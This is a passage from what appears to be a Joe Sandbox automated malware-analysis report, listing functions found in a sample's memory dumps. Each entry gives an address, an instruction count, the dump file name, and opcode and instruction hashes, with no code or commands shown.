                  • Instruction ID: d93be116d19423cf6715cfb3f82b27511e36dbe1cb64a4571eb211afb9247662
                  • Opcode Fuzzy Hash: daa44787d4ebc77f9cc43de2a14a78124b4de10f4784ed1b0efc1be8993bcc1c
                  • Instruction Fuzzy Hash: 0211A13090D68E8FE791FBA8844C5FA7BE0FF59350F0404B6D408C70A2EF3495448701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F1703D Relevance: .1, Instructions: 55COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e6b1e482e68d116551e9d12d2b0570b5791dc7244cc4808142472143d019c333
                  • Instruction ID: 658d69898fde9eae9384323fb53196bc26ab69d6051f8af745a0a8353552a9f6
                  • Opcode Fuzzy Hash: e6b1e482e68d116551e9d12d2b0570b5791dc7244cc4808142472143d019c333
                  • Instruction Fuzzy Hash: D111A03190DA4E9FEB99EF2484592BA7BA0FF69340F0501BED40EC21D6DF386984C741
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F16229 Relevance: .1, Instructions: 54COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 302dbe680c773ce8f98f73458ef5ff4540d3b6c6d8589aa127132b123cce1ae5
                  • Instruction ID: 0480c986105c8878cc17b05f63d3d7ad9481bc06983d2432f531c2971dc93d88
                  • Opcode Fuzzy Hash: 302dbe680c773ce8f98f73458ef5ff4540d3b6c6d8589aa127132b123cce1ae5
                  • Instruction Fuzzy Hash: AB115131D0D68A9FEB91FB2888596B97BF0FF5A340F0505B6D408C7192EB28A9848755
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F150FD Relevance: .1, Instructions: 53COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 65b93f4f8ddae87b78b7e451255f6808a28f6c77948fe90bf2196ad579b80258
                  • Instruction ID: fbde0f5cfa185e8b352e53291dc0f1107e3b1b5512b7b6bccd1a607126656bcc
                  • Opcode Fuzzy Hash: 65b93f4f8ddae87b78b7e451255f6808a28f6c77948fe90bf2196ad579b80258
                  • Instruction Fuzzy Hash: CA11917080D68A9FEB4AEB2484592B9BBE0FF18341F4404BED419D61D2DF296544C701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F12431 Relevance: .1, Instructions: 52COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 46b727dcf1f02e65fa928e2c5fb613a1ac2294e6c2fcbf3d8c08bb7d9c0efa6a
                  • Instruction ID: ff005e6cdaa4b7a9cfae0147ebea19777ef585dbdacf10f83583b6b883dc30e3
                  • Opcode Fuzzy Hash: 46b727dcf1f02e65fa928e2c5fb613a1ac2294e6c2fcbf3d8c08bb7d9c0efa6a
                  • Instruction Fuzzy Hash: 2F01BC3085D64A8FDB48EFA484992F97BA0FF19340F4104BAD40AC61D2EB35A960C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F005D8 Relevance: .0, Instructions: 50COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f5a0a3c93ddf1b8797cd6d788669c53448c731f090f8a587721668ec88d96571
                  • Instruction ID: c534e6a94b4e663e3823eace9a5bab7b03c28d18aa654c48009f3417d563c157
                  • Opcode Fuzzy Hash: f5a0a3c93ddf1b8797cd6d788669c53448c731f090f8a587721668ec88d96571
                  • Instruction Fuzzy Hash: 27018C3090850E8EEB58EF24C0586B977A1FF69345F50407EE40EC31D1EB35A590CB49
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F02E01 Relevance: .0, Instructions: 50COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 03164b8c4590ecd98cd6a1257b58a4261911f9a7549304077f094df192159ecb
                  • Instruction ID: ceea9d2a2a58f583ce1fff0de6f720fa9f2d45a2a62f9bc79cb17951bb115557
                  • Opcode Fuzzy Hash: 03164b8c4590ecd98cd6a1257b58a4261911f9a7549304077f094df192159ecb
                  • Instruction Fuzzy Hash: 7601783085D64A8FEB42BB6484592AABBE0EF5A340F0144B6D408C60A2EF38A1848614
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F17CD9 Relevance: .0, Instructions: 48COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 24c69b769f6c948775f1c69a531648fc4412fe5c1a9dc9bd7f005a110c921524
                  • Instruction ID: 6c66383ff3fe7daf20b77c218d0e24ee11d0e0aa68a41b91a7cbaddf00b54245
                  • Opcode Fuzzy Hash: 24c69b769f6c948775f1c69a531648fc4412fe5c1a9dc9bd7f005a110c921524
                  • Instruction Fuzzy Hash: 5E018C3080DA8E8FDB49AB34C8696B97BA0EF19340F1504BED00EC71D2DF25A944C741
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F0BF3B Relevance: .0, Instructions: 48COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f0a000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7ead477fd2ab29dc2f1c7d1d5fed830bb954fe92fae0d3197bf90b2fccf9b042
                  • Instruction ID: c7660e6010e98b5284f1710b7d6345e3493e0881b22d4faf1918efde0eeef7b5
                  • Opcode Fuzzy Hash: 7ead477fd2ab29dc2f1c7d1d5fed830bb954fe92fae0d3197bf90b2fccf9b042
                  • Instruction Fuzzy Hash: BD11AF70D1860A8FDB58EF98C494AECB7F1FB19351F10412AE449E73C5EB7469808B58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F17709 Relevance: .0, Instructions: 46COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 86140f4f4358e48d41e957b37ae2ce9a7379f9123adbce82940785db6af7dedf
                  • Instruction ID: 6e188d276b04195a9a3aa959ad2a4d6b0cc237ff5b4962349245a2b1ba9509af
                  • Opcode Fuzzy Hash: 86140f4f4358e48d41e957b37ae2ce9a7379f9123adbce82940785db6af7dedf
                  • Instruction Fuzzy Hash: 84017C7094EA895FE742BB3488595A97BE0EF59340F0508B2D40CC74A6EB28A844C711
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F17D4D Relevance: .0, Instructions: 46COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f1e17d46cfcc44cd20d7849baf7865bb4672e5a2ef50f69202c93954330131b5
                  • Instruction ID: 4cab2654c5abae1a4404a8de661177c3799cde41d51c6b900ab9c93d78b312ac
                  • Opcode Fuzzy Hash: f1e17d46cfcc44cd20d7849baf7865bb4672e5a2ef50f69202c93954330131b5
                  • Instruction Fuzzy Hash: 27019A3080DA4E8FEB59AF2484692B9BBA0FF18340F0504BED40EC61D2DF75A850C744
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F02E79 Relevance: .0, Instructions: 46COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c38724cf4a3c7d07edd46ce7398eb5b6429a0e50377004479e885acd2d4d043c
                  • Instruction ID: 66dc9afde1851d6879ba0ecc05d414e7b76227b373dc251608c786e3b20ffd71
                  • Opcode Fuzzy Hash: c38724cf4a3c7d07edd46ce7398eb5b6429a0e50377004479e885acd2d4d043c
                  • Instruction Fuzzy Hash: 9301DF3088D68A8FE743FBB888581A97BE0EF5B340F5509B2D00CC70E2EB38A4448720
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F0ABA9 Relevance: .0, Instructions: 45COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f0a000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5bb4d561f3f8d29f768f9bb0b9ddc979528683df7639bdd1866a7b85b0b4a5df
                  • Instruction ID: acd6d3e41f74aa91de6dfecef716a8fe713a8139d2732e5270a0c1a3745d64c2
                  • Opcode Fuzzy Hash: 5bb4d561f3f8d29f768f9bb0b9ddc979528683df7639bdd1866a7b85b0b4a5df
                  • Instruction Fuzzy Hash: D201847090D6899FE752BB3888595B97BE1FF1A341F0645F6D409C70A2FB38E4848715
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F027DD Relevance: .0, Instructions: 44COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d5436d4850dd0b66c11be366c89dc260100125f9654e591f4e9a61e3b233ba88
                  • Instruction ID: 40f564ad6bfd78b66b11a092fa555f915a95ea97a366c3d0dc18615250d10e18
                  • Opcode Fuzzy Hash: d5436d4850dd0b66c11be366c89dc260100125f9654e591f4e9a61e3b233ba88
                  • Instruction Fuzzy Hash: DC01B83090D64A8FEB42FB6888582B9BBE0EF5A340F4544B7D408C70E2FB38E044C724
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F00610 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fa37fddb46a1747402aa0c4849eeb03ddf51e1e878212b82039f4c10fb6635af
                  • Instruction ID: 427e52586e05707292d125cbbcbf0baa63a8f7abea4b5f51510b77402c6bf7d7
                  • Opcode Fuzzy Hash: fa37fddb46a1747402aa0c4849eeb03ddf51e1e878212b82039f4c10fb6635af
                  • Instruction Fuzzy Hash: C4016930818A0E9EEB4AFB6484582BAB7A1FF19345F50087EE81EC21D2EF35A554C624
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F00608 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4d99a1b702ec9b78b655c1bb20e58470013fdba461fc5e0d1b9756397e9af36a
                  • Instruction ID: 2fdf7f94edeac2f7fe8240c5c7c1ea7dfb669fa5ed4548562911e0464ef88cc4
                  • Opcode Fuzzy Hash: 4d99a1b702ec9b78b655c1bb20e58470013fdba461fc5e0d1b9756397e9af36a
                  • Instruction Fuzzy Hash: 23018C3081960E9EEB4AFF64C4992BAB7A1FF19345F50087EE40EC21D2EF35A590C714
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F01230 Relevance: .0, Instructions: 40COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 76a837c3abaaeaa1fd6042ec86d175819b8a59a7d583e7dc795f691f6ef400ee
                  • Instruction ID: 52e0277bd5d77a1f5187e07d02eab398c5e3ae114668d0a088608419269fda3d
                  • Opcode Fuzzy Hash: 76a837c3abaaeaa1fd6042ec86d175819b8a59a7d583e7dc795f691f6ef400ee
                  • Instruction Fuzzy Hash: 14F08C30D1D59B8EEF99AF6888582FA77A4FF56244F00057AE419C60D1FF3455848654
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F005D0 Relevance: .0, Instructions: 39COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 60f90f9b6c3e49e32ac809e8b6d6539f2ec3c930544a85c076fcc96bd5d2bc2a
                  • Instruction ID: a4cdf0e41959e440e74995930bb416b40d6e6b177e416c2bff5a824444b5c52f
                  • Opcode Fuzzy Hash: 60f90f9b6c3e49e32ac809e8b6d6539f2ec3c930544a85c076fcc96bd5d2bc2a
                  • Instruction Fuzzy Hash: EDF0A93080E64E8FEF94EF2494052FA77A4EF16348F40407AE80DC21D1EB39A4A0CB89
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F01C1D Relevance: .0, Instructions: 39COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e35ae274d740524dc9934ff5f237035bc1553a1b9b0e0eeae9895b2e811195ee
                  • Instruction ID: a955b5aaddf7ecccf938a3cadc157e9bb85267d3419979b8a27366d8fe328709
                  • Opcode Fuzzy Hash: e35ae274d740524dc9934ff5f237035bc1553a1b9b0e0eeae9895b2e811195ee
                  • Instruction Fuzzy Hash: 1101AD3090E68E8FEB55EF2488592E97BA1EF56340F4440BED808C21D2EB35D490C749
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F0B2C8 Relevance: .0, Instructions: 35COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f0a000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4339929d2dcfdae6cae78679f11fab5b00493f774adb3bd624ceb5735bc5f2db
                  • Instruction ID: 4536b58d00cfc2ec62feec69fa0be2e1521dec71c5d0f1eed078a91e637c5db0
                  • Opcode Fuzzy Hash: 4339929d2dcfdae6cae78679f11fab5b00493f774adb3bd624ceb5735bc5f2db
                  • Instruction Fuzzy Hash: 3CF03C70E1D6298EEB95EB18C455BA973B1FF59340F1042F6D40DE3296EF34A981CB44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F0BF77 Relevance: .0, Instructions: 35COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f0a000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9cad7810a871ddf9f03791a0235fd5f32d84cc0759c96604ba31aa9fb10977cd
                  • Instruction ID: 112869aa152fdde59be6f6f39bccbabd9ebfae2bf714a1c4c440a4f31378c3a9
                  • Opcode Fuzzy Hash: 9cad7810a871ddf9f03791a0235fd5f32d84cc0759c96604ba31aa9fb10977cd
                  • Instruction Fuzzy Hash: AA01AE70D1860A8FEB54EF94C4447ECB6F1FB19352F10413AE449A73C5EB7969848F58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F0276D Relevance: .0, Instructions: 34COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 318f6b796f01cf35662c89d64c5f96a474140fd50567755ddf63184cb878c880
                  • Instruction ID: 1fa332f2feed9a8fc6ae30a4c4a56e02fccbbece04e2140383d89da26d826e3b
                  • Opcode Fuzzy Hash: 318f6b796f01cf35662c89d64c5f96a474140fd50567755ddf63184cb878c880
                  • Instruction Fuzzy Hash: A6F0903180D68D8FEB5AAF6488291B97BA0FF56241F4405BEE809C61D2EB789454C711
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F026F9 Relevance: .0, Instructions: 33COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6b1d46799641717efa66dbe4d64564a8256e1ea1f2e36bcd3d201b6d25f46083
                  • Instruction ID: d0367ee3868ed4c4788ac42d756a76e5e62c7195c822d9705fb74dd24c6b9edf
                  • Opcode Fuzzy Hash: 6b1d46799641717efa66dbe4d64564a8256e1ea1f2e36bcd3d201b6d25f46083
                  • Instruction Fuzzy Hash: 86F0963080E7C98FEB5AAF6488691B97FA1FF16205F4505BFD409C60D3EB389558C711
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F0B92E Relevance: .0, Instructions: 29COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f0a000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b68d218d6093fc0f9a2247eb60a1d63ba3937d9a903e19ffad13d5ddff409a6a
                  • Instruction ID: 356fd26b5ae0905b94495e652f1bec0da5241584717d5b6544ffb6657ade43f0
                  • Opcode Fuzzy Hash: b68d218d6093fc0f9a2247eb60a1d63ba3937d9a903e19ffad13d5ddff409a6a
                  • Instruction Fuzzy Hash: 8AF07F70D199199EEBA2EB2888857E8BAB1FF4A340F4040F5D40DD2292EF346AC08F15
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F00F80 Relevance: .0, Instructions: 28COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cb313bf80c65d57f537403a78c43d3372d47a7337346242056f2c80ceaab7790
                  • Instruction ID: ae83de10eb0c4b91acbc177455c794784b7dc604bfa0576e2bdf7c6c8d1d6a36
                  • Opcode Fuzzy Hash: cb313bf80c65d57f537403a78c43d3372d47a7337346242056f2c80ceaab7790
                  • Instruction Fuzzy Hash: 07F0173090D509CFEB20FB04C844BEEBAB1FB95355F105276D409A32D5EF386A84CB88
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F12B54 Relevance: .0, Instructions: 24COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a7d5576be70dbfad75114c084eecc733dbffa50f7049ddd46385ff4fb90ee1d5
                  • Instruction ID: b051d52066d3a55f7fa788e8eecb332a940df5d5b3ee5f46400e76414a8d8869
                  • Opcode Fuzzy Hash: a7d5576be70dbfad75114c084eecc733dbffa50f7049ddd46385ff4fb90ee1d5
                  • Instruction Fuzzy Hash: 9DE0923190C2468FEB02EB94C4106EC77B0EF56350F0581B7C456D72D2DE7868588B58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F16CBB Relevance: .0, Instructions: 23COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1010af5f8044fa2956a3665f084a235ed9ee45229a9688aa07ec51e4a74c06f2
                  • Instruction ID: 289400bd459e2f311bd07affde9f386d1d50906fbdec77d655adff41c3d23826
                  • Opcode Fuzzy Hash: 1010af5f8044fa2956a3665f084a235ed9ee45229a9688aa07ec51e4a74c06f2
                  • Instruction Fuzzy Hash: 4BE08C3084890C4FDA24BB69984429977B4FB89305F50022AD40CD7081E7395995CB04
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Function 00007FF848F113A7 Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID: %$-$-$/
                  • API String ID: 0-3766047989
                  • Opcode ID: 00a4c4ffa88871b19339b329a8a514c3fbca120578dba09027965887529b8a59
                  • Instruction ID: e660aa8c28d3bd165c796dd4cb7ff72e9bc28c5385253c2bbd7425919d3a9913
                  • Opcode Fuzzy Hash: 00a4c4ffa88871b19339b329a8a514c3fbca120578dba09027965887529b8a59
                  • Instruction Fuzzy Hash: D451B374C086298FEBA8EF64C4947ECBBB1AB18341F5041A9D04DA72D2DB3869C4DF04
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F11AE7 Relevance: 5.0, Strings: 4, Instructions: 43COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID: #$'$/${
                  • API String ID: 0-2795190509
                  • Opcode ID: 979087d62072a0af01d37dd91e733742c5745b02f70cab24ef4df5a857ffd14f
                  • Instruction ID: 55d67488c750950bf84ce84a0c963e5df795dc451531aebd597c875664dbae96
                  • Opcode Fuzzy Hash: 979087d62072a0af01d37dd91e733742c5745b02f70cab24ef4df5a857ffd14f
                  • Instruction Fuzzy Hash: F711F574D0861A8FEB64EF44C8847EEBAF1AB19351F5000BAD44DA72D1DB385AC0CB04
                  Uniqueness

                  Uniqueness Score: -1.00%